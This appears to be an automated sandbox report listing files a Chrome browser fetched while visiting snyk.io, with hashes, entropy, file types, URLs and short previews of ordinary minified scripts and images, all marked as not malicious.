                                                                                                                                                                                                                                                                                                              MD5:0AA5002702487976D570A640C408EBA5
                                                                                                                                                                                                                                                                                                              SHA1:48930F22A2396DF313CCDFCB91CAC20E38F2B06B
                                                                                                                                                                                                                                                                                                              SHA-256:4E8276AEA0A3C7FE3600E6718C7F484D49C347C8D5763D89BE95900D526A14DA
                                                                                                                                                                                                                                                                                                              SHA-512:37A9D609DB21EE1E696CB437C02F0F6410925EB10B6353C0CDF95DB265E342F0BC3D2AE1851D209E4517D978B7CCBE8AD56F98247FA865AE405FAFD4D2E62CDA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snap.licdn.com/li.lms-analytics/insight.min.js
                                                                                                                                                                                                                                                                                                              Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):140001
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.264489136067095
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:M3ov1NH6ZMumbFHH4jeUn6SJk1SNoc7I6rRqQL:M4zb5e6Sa1SRBFhL
                                                                                                                                                                                                                                                                                                              MD5:3E0BE0C20D8EC72D51721FA067BCF007
                                                                                                                                                                                                                                                                                                              SHA1:4A609E7D590673D77039B3819E940CD201DC26EA
                                                                                                                                                                                                                                                                                                              SHA-256:B051674B20E716839CEB594FF84B53CD3C9FFB3180EFC7A30F23203C5303C364
                                                                                                                                                                                                                                                                                                              SHA-512:57489E972EA9682B4DDA3B43547BC4F134B11E7F741C49643B88E49F47BE8B525110741B1E17BDFCFBF225CB6289721EE4C431E1678CB0AC0B060B691A726952
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,n,t){var r,l,a,u,o,i,s=t(67294),c=t(63840);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var d=new Set,p={};function m(e,n){h(e,n),h(e+"Capture",n)}function h(e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFD
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3757)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):6373
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.633527172256383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:rpbUIaS10/0SCm9ktxUeWvUVUNGO97rPlo8E2hnEDLhak4ZYejCxrE:9bUIvkkhVUoerdo8jnEDLkksXjwrE
                                                                                                                                                                                                                                                                                                              MD5:641C8C8F4E0575ADCF79A3228A7C1B87
                                                                                                                                                                                                                                                                                                              SHA1:B6709412F4F674F7AF00E83EA2D4EE01718CB66F
                                                                                                                                                                                                                                                                                                              SHA-256:6DC31422E6F6100518688D444F8A1EA503873EE89ED0CEBD048E7206B9110130
                                                                                                                                                                                                                                                                                                              SHA-512:EEF55678199599DFA94CE6B2BC93255B359E9783E5CF1CECA7E5928CBC5F40D974598344E3FF4591D74619A056EE0DA347F78BF8A9B7598C68C7AA7B455BA795
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:window.FormsPlus=window.FormsPlus||{allDescriptors:{},allMessages:{},detours:{}};FormsPlus.emailPattern={match:function(userEmail,patternList,negate){let userFull=userEmail.toLowerCase(),userParts=userFull.split("@"),userDomain=userParts.pop(),userMailbox=userParts.join("@");const MODE_DOMAIN_SUFFIX=1,MODE_DOMAIN_PREFIX=2,MODE_DOMAIN_FULL=4,MODE_MAILBOX=8,MODE_FULL_REGEX=16,MODE_FULL_EXACT=32,MODE_PLAIN=64,MODE_HASH=128;const RE_LEADING_WC=/^[.]/,RE_TRAILING_WC=/[.]$/,RE_TRAILING_SEP=/@$/,RE_EMAIL_LIKE=/^.+@.+$/,RE_TAGGED_HASH=/^\[h:([a-f0-9]+)\]$/i;let isSomeMatch=patternList.some(function(pattern){let matchingMode=MODE_DOMAIN_FULL|MODE_PLAIN;if(pattern instanceof RegExp){matchingMode&=~MODE_DOMAIN_FULL;matchingMode|=MODE_FULL_REGEX;}else if(RE_EMAIL_LIKE.test(pattern)){matchingMode&=~MODE_DOMAIN_FULL;matchingMode|=MODE_FULL_EXACT;}else if(RE_LEADING_WC.test(pattern)){matchingMode&=~MODE_DOMAIN_FULL;matchingMode|=MODE_DOMAIN_SUFFIX;pattern=pattern.replace(RE_LEADING_WC,"");}else if(RE
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6259), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):6259
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.305841730217248
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:+tRzMPexs+3ng+XcLKzY5rysZ4Oaqb6XueVKy8tOVN77ndrqKhjt:WsmnMKcV/Zv+AfSNHdWKv
                                                                                                                                                                                                                                                                                                              MD5:1CCCD9C8380E466698D1CBB982D779B5
                                                                                                                                                                                                                                                                                                              SHA1:42C0A7672FF6487D5639D752E3AAE64A0CF280CA
                                                                                                                                                                                                                                                                                                              SHA-256:C2155C205DD65A6A13D22C7804B8A8FF077235FCC1C7FE5F3EF6ADC840CD6AD5
                                                                                                                                                                                                                                                                                                              SHA-512:63003DAB09254179216AD274300931F302490CDE6F07EEA82615A5FC1F8EC44B9715B07684D081F61226636699446BE0EC9EC4A64762ABCFFD10B6AA7301E4EC
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/5662.de65dddd439a4870.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5662],{51404:function(l,i,e){var n,a;let o=null===(a=Object.keys(e(10194).r$))||void 0===a?void 0:null===(n=a.filter(l=>!(null==l?void 0:l.includes("patch-"))))||void 0===n?void 0:n.map(l=>null==l?void 0:l.replace("pose-",""));i.Z=["",...o]},86604:function(l,i,e){e.d(i,{Z:function(){return d}});var n=e(85893),a=e(45697),o=e.n(a);function r(l){let{children:i,className:e}=l;return(0,n.jsx)("figure",{className:e,"data-component":"Media Asset Container",children:i})}r.propTypes={children:o().element};var d=r},94578:function(l,i,e){e.d(i,{Z:function(){return t}});var n=e(85893),a=e(45697),o=e.n(a),r=e(44133),d=e(51404);function s(l){let{as:i="div",pose:e="alert",reversePose:a,className:o}=l;return(0,n.jsx)(i,{className:(0,r.Z)("w-full patch pose-".concat(e),"span"===i&&"d-inline-block",a&&"flip-h",o),"data-component":"Patch"})}s.propTypes={as:o().oneOf(["span","div"]),pose:o().oneOf(d.Z),reversePose:o().bool,className:o()
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):15
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7735572622751845
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:EUs:K
                                                                                                                                                                                                                                                                                                              MD5:CB86A27625B7DEADD6A4C2FA9A61719C
                                                                                                                                                                                                                                                                                                              SHA1:18430EE6A19A9EE70617527A63815E22D77BD207
                                                                                                                                                                                                                                                                                                              SHA-256:36EB28EFE4FD7B248E1CDD08AF2124A8F0C64A0958C762C128FD7DA540298ABC
                                                                                                                                                                                                                                                                                                              SHA-512:B811B97625784FC90D63BCDA479DDB69B2C8D3E67FC71D50F85620DABDC46284B43CCC367387352CED29DC7C81651F1C7CB117EB93A0A39ADE1E2CA9C702DF10
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:jsonp942139([])
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):15
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7735572622751845
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:EUs:K
                                                                                                                                                                                                                                                                                                              MD5:CB86A27625B7DEADD6A4C2FA9A61719C
                                                                                                                                                                                                                                                                                                              SHA1:18430EE6A19A9EE70617527A63815E22D77BD207
                                                                                                                                                                                                                                                                                                              SHA-256:36EB28EFE4FD7B248E1CDD08AF2124A8F0C64A0958C762C128FD7DA540298ABC
                                                                                                                                                                                                                                                                                                              SHA-512:B811B97625784FC90D63BCDA479DDB69B2C8D3E67FC71D50F85620DABDC46284B43CCC367387352CED29DC7C81651F1C7CB117EB93A0A39ADE1E2CA9C702DF10
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://trackingapi.trendemon.com/api/experience/personal-embedded?AccountId=2025&ClientUrl=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F&MarketingAutomationCookie=&Ids=%5B%5D&Groups=%5B%5D&StreamId=&callback=jsonp942139&vid=2025:17297993867885496
                                                                                                                                                                                                                                                                                                              Preview:jsonp942139([])
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 96x96, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1626
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.883434608106295
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:HEM53yqhq2tXx4sRD5U34KpKbpLrt6W/opP7EBpiGQQZyoIBUD9S8r1YrYLP15+:Hpp97PNosbh4kKIBNvIBUhbBdQ
                                                                                                                                                                                                                                                                                                              MD5:9D1DE83835241DE7D277B9C908EFA3CB
                                                                                                                                                                                                                                                                                                              SHA1:7CBD0229EFFEDA7A969084470DEDFF92F4EECB13
                                                                                                                                                                                                                                                                                                              SHA-256:5978E902DD7538A77F50DB034CF2D053A8C9286E96A7966801D06D5234A6A07B
                                                                                                                                                                                                                                                                                                              SHA-512:950B2E159448835CF31E2A165AB2307088DAAE275AC821DFC0DF63951F9496D7FDA5F46BCC4C440DD01A5781B227136F6A0D63A9BBC2A35F24338E65775DC6A9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1712924683%2FJacob-Salassi-Snowflake.png&w=96&q=75
                                                                                                                                                                                                                                                                                                              Preview:RIFFR...WEBPVP8 F...0....*`.`.>.@.I%."!*.[....be...f...O48.|.....z :.w.1\eP...4Z..W.4ys...|.b..'...lu..G....:........[>.<7.[4t.;.}F.P.G...x.!.a'..Ot#....E.Ff.........4:>.H~...i.i.$..U..U.z.T.W.??..6|V.......3S.08V.bf...K.7&y(gX...l....f#............!.....*u+4EY.2.Z...........*={..lp..1w....4......x^#5.5.z.........t.....z..o......KL...9u.(.....ly..z^..I.z....S?.J........xS.......1..a)8/9tVb....qK..W.....W..qzi;.-.T..4.:co.<y.;L/..*....1?zX...#.Z+..3Y....n`i.;.x...,nnb.q.9..3...2..T..6&..oY....s..[8..?..............Tk&..e../._@......}".+..q....E_...n..PC?....p.......Gcf..j...B...*.L...]i...P..=...5...>.T~.-...:.,..JE.gB..=EbW.0.....)....J...RS......(.n..Cw....l.ttz..2td).J.g.Ps.jy`.4..F.#..j.....2.........Ok[j..|.e.;..>r...T.C...|t;..Z0c..OA.3.{...b.<....wZk.K..IB...X%.8..P.....aUX.M6O...r...3..:m_@Q.Sm/$...`.L........'.c........@v.X...{7.^.=.....1...O.q....W$p6E.mu..YU....ui.W.E.\k...Hy8...*`..Qv....p..........M...6.o[...S...7..E.9..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7215), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):7215
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.715038918631035
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:XFP79r8FRHF6U/Atg28bngH1nlm6AVPhJ98evibOEOxWShjulmu/TuVH5coKW8A0:p7VfnzeuN/Tk4
                                                                                                                                                                                                                                                                                                              MD5:1C6A1D59A85DC5CC5C7E07197599E9CE
                                                                                                                                                                                                                                                                                                              SHA1:C0E9404A317D60811E5190607D9F74073B9F9CC6
                                                                                                                                                                                                                                                                                                              SHA-256:DBEBA2B031E84A4C7100F7E8F2FE7284C9D296FA1BD2861889F86DF1D708B7B1
                                                                                                                                                                                                                                                                                                              SHA-512:84FBDD8171E910EFA566A3750DA726206EE3BA1AD4BD3F7BD8EF0A6AB52FA86A994D6EE94209F787E88EB6219C1FBE3B7E806E785E8D944525A06BB44D74CBA3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[5],{"/7QA":function(t,i,E){"use strict";E.r(i),"production"!==E("LeJ0").a.ENV&&E("Cp41");var A=E("9EWH"),_=E("ADGC");Object(_.b)()&&Object(A.b)();!function polyfillKickoff(t){try{[1].includes(1)&&t()}catch(i){Promise.all([E.e(49).then(E.t.bind(null,"imET",7)),Promise.all([E.e(2),E.e(40)]).then(E.t.bind(null,"H+SE",7)),E.e(15).then(E.t.bind(null,"2GZm",7)),Promise.all([E.e(2),E.e(12),E.e(7)]).then(E.t.bind(null,"LSZE",7)),E.e(54).then(E.t.bind(null,"3yYM",7))]).then(function(){t()}).catch(function(t){return console.error("Error importing polyfills",t)})}}(function kickOff(){Promise.all([E.e(52),E.e(37),E.e(22),E.e(19),E.e(43),E.e(20),E.e(26),E.e(14),E.e(11),E.e(18),E.e(50),E.e(42),E.e(29),E.e(21),E.e(8),E.e(16),E.e(24),E.e(17)]).then(E.bind(null,"V+70")).catch(function(t){return console.warn("loading root widget failed",t)})})},0:function(t,i,E){t.exports=E("/7QA")},"91+0":function(t){t.exports={"//WS_CHAT_BASE":"localhost:4000",ENV:"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3442), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3442
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2351556107667045
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ibMBAdqAORuJ/OpV4jijjU4yuT0R0GR0BOsj24CMJPPG7Fy4:p1buwQ0GR0myJGy4
                                                                                                                                                                                                                                                                                                              MD5:7ABCA888C0D57AB9671D55BE3B5C4AF4
                                                                                                                                                                                                                                                                                                              SHA1:674A249661099771C3BC4989B536D22CA4EA56FE
                                                                                                                                                                                                                                                                                                              SHA-256:9E272AA1275AE85EA34C711FF9B49D34B0CFA0EF40A470EB6A35767E3DB0D248
                                                                                                                                                                                                                                                                                                              SHA-512:B6B40CC2C508B55BF9D8EA3E1972B5A71566C759CA309AECD59E54C341E5C66D533BAB8407D6C5B635475BD72941A9818508A2F44DEF961FC24A55AD9427B0D3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/8315.747656db2e96420a.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8315],{73359:function(l,n,i){i.d(n,{Z:function(){return u}});var e=i(85893),o=i(45697),a=i.n(o),s=i(44133);function d(l){let{label:n,className:i}=l;return(0,e.jsx)("span",{className:(0,s.Z)("badge",i),"data-component":"Badge",children:n})}d.propTypes={label:a().string,type:a().string,className:a().string};var u=d},58315:function(l,n,i){i.r(n),i.d(n,{default:function(){return x}});var e=i(85893),o=i(45697),a=i.n(o),s=i(24982),d=i(73359),u=i(44133),t=i(6215),c=i(15020),r=i(46275),v=i(52752);function m(l){var n;let{label:i,description:o,url:a,icon:c,badge:r,colorScheme:v,spotlight:m}=l;return(0,e.jsx)("li",{className:"submenu-nav-item","data-component":"Sub Menu Item",children:(0,e.jsxs)(s.Z,{href:a,className:(0,u.Z)("submenu-link",m&&"spotlight"),trackingLabel:"cta_click_main_nav",trackingProps:{cta_location:"Header"},children:[c&&(0,e.jsx)("i",{className:(0,u.Z)("general-icon","icon-".concat(c))}),(0,e.jsxs)("div",{cl
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10517), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):10517
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.436701020601256
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:ofK7LwQ0LjUgZOOSqIw5dxQNEGSk37vldT+/6cMpc6:oi7LwQ6jxsOSqXhQMwT+/Hf6
                                                                                                                                                                                                                                                                                                              MD5:CB1FBD4EA4275B0C84DD670691F52CA0
                                                                                                                                                                                                                                                                                                              SHA1:78609A3F5E4F25BDB34CEE98E4788F3E6504018C
                                                                                                                                                                                                                                                                                                              SHA-256:69D6CB2AB72FA0DE0D66E9B4084DB0E538D4160D4DB5041914AF401ECE1E777D
                                                                                                                                                                                                                                                                                                              SHA-512:33D85D6317C3C4E400E9581DA88121CAA62532C3A5340B8C2751FE7C15C8D9C129648A826097F701636B3D810C9AAA01CF4805617EC41660A9ADC5D839E99EFB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9253],{24881:function(e,l,n){n.d(l,{Z:function(){return i}});function i(e){let{url:l="/",locale:n="",basePath:i="",slug:d=""}=e;return[l,"en-US"===n?null:n,i,d.replace(/^\/|\/$/g,"")].filter(Boolean).join("/").replace(/\/?$/,"/")}},3770:function(e,l,n){n.d(l,{Z:function(){return t}});var i=n(85893),d=n(2962),a={src:"/_next/static/media/default-snyk.8953a9bd.jpg"};function o(e){var l,n,o,t,r,u,s,b,c,v,p,m,g,h,G,w,k,f,y,C,x,P,T,S,j,A,F,_,B,L,Z,E,M;let{data:N,locale:U,hrefLangs:I,contentTags:R,ogArticleObject:D,fallbacks:$,force:q,...z}=e,O=/\| Snyk$/,W=e=>O.test(e)?e:e+=" | Snyk",Q=(null==q?void 0:q.noIndex)||(null==N?void 0:N.no_index),V=[...(null==R?void 0:null===(l=R.fields)||void 0===l?void 0:l.audience)?null==R?void 0:null===(n=R.fields)||void 0===n?void 0:n.audience:[],...(null==R?void 0:null===(o=R.fields)||void 0===o?void 0:o.contributor)?null==R?void 0:null===(t=R.fields)||void 0===t?void 0:t.contributor:[],..
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.136248672727249
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YIzIX/GZR49aLVAL4n:YIyGvvVln
                                                                                                                                                                                                                                                                                                              MD5:905B1FBB26E082557FF0B3B3553CDA6C
                                                                                                                                                                                                                                                                                                              SHA1:8FE0790D6026998BDB2C9FFA3B915952E613E1B4
                                                                                                                                                                                                                                                                                                              SHA-256:F249B63CB2FCB66B47E86F906C98F8FD912E82DD035B4E53D7E72FC1960CFD16
                                                                                                                                                                                                                                                                                                              SHA-512:284567E83A5C15761498249B27B4B700AA081A65B858F29458E5D0F3DEBDEA93DD5CFAD94EEFAEB43837E70CC288B2A34EA168D2771CB57C993E269C287097CE
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"message":"Missing Authentication Token"}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, was "all.min.js", last modified: Mon Sep 23 13:58:40 2024, max compression, from Unix, original size modulo 2^32 308489
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):61290
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.995652790037787
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:1sWn9SJv4odtqBjfiXCFYBnxvmX9+UBBazMvkunR:1sCMv4YYpPFYBnxuX9+7zhK
                                                                                                                                                                                                                                                                                                              MD5:7226EF628FCAEA5DAD96B32F975AFB3A
                                                                                                                                                                                                                                                                                                              SHA1:EECAE9CE5666D4BFDBCD4EDC8BDC6679DC5E15EE
                                                                                                                                                                                                                                                                                                              SHA-256:7604729EDAC0B4895E44AFE2B5297C1E2CD982370DB0E781C4EF0B912A0A9E39
                                                                                                                                                                                                                                                                                                              SHA-512:AEA58572A7B4E23FB01D6EF07AA4B4DBCDFCE9D9B9AAB3DDFA8370A6E932283AB92C62EB4C946623B4B2E6305F2D844F78A5E253F73A088BFAA75BCFBF56224A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://assets.trendemon.com/tag/trends.min.js
                                                                                                                                                                                                                                                                                                              Preview:.....t.f..all.min.js..[{..6..*2.S...z..&.i...Yo9./3..F..HHBL.Z...x..~....4.;....*#.h4..F..by..<..`...8Z.X....m..(|.r.v9...b...Py..X....g+..,.d....WA......rp=_.%..g...,j-. ...T.j...TR.ly..u.....oe.R.a...Kp..6q.....9..)^L.l...A.|..P<.h.6J3....&..|..._.|.wy.>..Qp.s..Z.y..L.!..M\.d....!f*^.....PA.Mh.........dc....D.*.b.{..E..g....e1....d!v....iU7....aY....C."...n..b.~?..@..#..x....!.'\....h..3}..g.m..<..~.3.6.H,.aWN.3O..#......8.....3_n..P...-....d.s..z..F{...r%'.H.....B...OM3 )....].'vy..q...j..O.v.zo.n.......s...O%.:..4.,...O<.)...../.6..h.....,.x....I.!...@..F].......kC..Q.y..p.RWx...........,8$. Q.......S. .U.hj.........nc\.. .?.PF.x..~...E..-.........OK......]XC.H.`..lL._d;n...... .Vnq.Y@Bc>j./..U!8G.5@...|..`..:....'....d[.w.......QT....~Ot>....O....e...a8Bs.Ts..S........4C6AGG...o..+..A;..h.W8t...H..YC...O|5....K....G._..;-.V....V..I...J..3..<8..i.'3....0..H.?`...w....?;.......h=.Mg..i-...Q...xw.A......n....US..e.4.?.......r......9.....y
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):15086
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.174836608632289
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:uSigNb1OOOOO1OOOOOZOOOOOFOOOOOZoqOO31OOiOg4E1+/OO8OGwOUOZOXOO4OJ:uSLO20+Rn
                                                                                                                                                                                                                                                                                                              MD5:DED7E6A096971A6BE447198B6D2D013A
                                                                                                                                                                                                                                                                                                              SHA1:3E5BE2EF6E8EB7F39C13D94503DDADC3C98806E8
                                                                                                                                                                                                                                                                                                              SHA-256:51529E0966473C5BD68677B91F609C6CA6436674A3A9D4A7F1CC81064EA2CF1F
                                                                                                                                                                                                                                                                                                              SHA-512:AEAB157873971B7983F7E3AE272E832CF34783028EE66433C08D70F78EA9BDFD4C72B19065B9C0524E345C45995A62BF3271B36C40E3A2C3A016AE45CC19A959
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/favicon.ico
                                                                                                                                                                                                                                                                                                              Preview:............ .h...6... .... .........00.... ..%..F...(....... ..... .............................Q02j`<>.zRR.rST.xVX.pLM.wPP.d<=.d@A.rST.`<>.b::.X56.Q02d........Q02d`<>.wPP..dg..z|.xVX.wPP.d<=.rST..qv.iJN.b::.X56.Q02]........P01S`<>.wPP..qv......lt.wPP.f>=.hS^.tw..hS^.b::.U46.P.0N........P/1BZ8:.wPP.~\_..dg.xVX.wPP.f>=.d<=.iJN.gCF.b::.S24.Q028........Q028V46.wPP.zRR.zRR.zRR.wPP.f>=.b::.b::.b::.b::.V46.O-.-........Q02]U46.tNN.zRR.zRR.zRR.wPP.f>=.b::.b::.b::._9:.U46.P01S....Q.0.R24.\BG.d@A.wPP.`<>.d@A.gCF._9:.X56.X56.b::.X56.W<B.R13.Q.0.O-.-Z@E...\BG.`<>.S36.Q02.R24.R24.Q13.R13.X56.W<B.ns..V<B.P-.#O-.-Z@E...pdr.Q/0.R13W....Q/1.Q/1.....Q02]Q/1.bYj.u...V<B.P-.#Q.0.R13..~......S24.Q028................Q028S24.ns..kl..R13.Q/1.....Q02]hS^.....V8<.P-.#................P-.#V8<.qz..\JU.P.0N........Q.0.V8<.pdr.V8<.Q/1.................Q.0.V8<.bYj.S36.Q/1.............Q02jU46.R13.Q/1.................Q.0.R13.U46.Q02]................Q.0.R13.R13.........................R13.R13.Q/1...................
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):119016
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.965595543506116
                                                                                                                                                                                                                                                                                                              Encrypted:false
